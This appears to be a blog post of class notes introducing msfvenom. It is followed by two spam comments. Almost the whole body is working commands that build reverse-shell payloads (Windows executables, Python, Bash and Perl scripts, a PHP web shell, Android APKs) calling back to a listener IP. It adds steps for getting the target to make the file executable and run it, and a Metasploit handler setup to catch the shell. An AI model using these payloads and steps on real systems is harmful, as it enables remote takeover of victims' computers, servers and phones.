Introduction of MSFVENOM

Grade 2 Session 9
===================

MSFVENOM : Which createsd payloads and binds up the encoding function in that.
Msfpayload and Msfencoder in 2015 they both get binded up in one single functionality known as MSFVENOM.

We use Msfvenom outside the platform of MSFConsole, cause msfconsole will only provides listening on the reverse connection via exploits.

1. Application based Payload : Windows (.exe)

Microsoft Operating System —> exe —> file.exe —> executable

msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe

> which we will make executable

2. Python Based Exploit for Unix/Linux System

msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py

Dependencies :
Transfer pyth.py in the target machine.
Ask the target to make it executable by typing
chmod 777 pyth.py

3. Bash Based Payload for Linux/Unix

msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh

Transfer lmao.sh in the target machine.
Ask the target to make it executable by typing
chmod 777 lmao.sh

4. Perl Based Payload For Linux/Unix (Runs Perfect on MAC)

msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl

Transfer troll.pl in the target machine.
Ask the target to make it executable by typing
chmod 777 troll.pl

5. Creating a PHP Shell For Servers

msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php

6. Exploit Android/Smart Phones using metasploit using tcp

msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk

7. Exploit Android/Smart Phones using metasploit using HTTPS

msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk

FOR ALL THESE, USING METASPLOIT FRAMEWORK LISTENER TO LISTEN THE REVERSE CONNECTION :

> Open MSF = msfconsole
> Use Exploit = use exploit/multi/handler (A wildcard Exploit which can be used for listening to the reverse connection.)
> msfconsole
use exploit/multi/handler
set payload PAYLOADNAME
show options
set lport PORTADDRESSFORLISTENING
set lhost IPADDRESSFORLISTENING
show options
exploit

———————————————————————–

After Meterpreter,

meterpreter> ? (Show Options)
meterpreter> Use Commands

———————————————————————–

MOBSF (Mobile Security Framework)-

3 comments on “Introduction of MSFVENOM
  1. Just wanna input on few general things, The website design is perfect, the subject material is rattling great. “The reason there are two senators for each state is so that one can be the designated driver.” by Jay Leno.

  2. Do you have a spam issue on this website; I also am a blogger, and I was wanting to know your situation; we have created some nice practices and we are looking to exchange methods with others, why not shoot me an email if interested.

Leave a Reply

Your email address will not be published. Required fields are marked *

*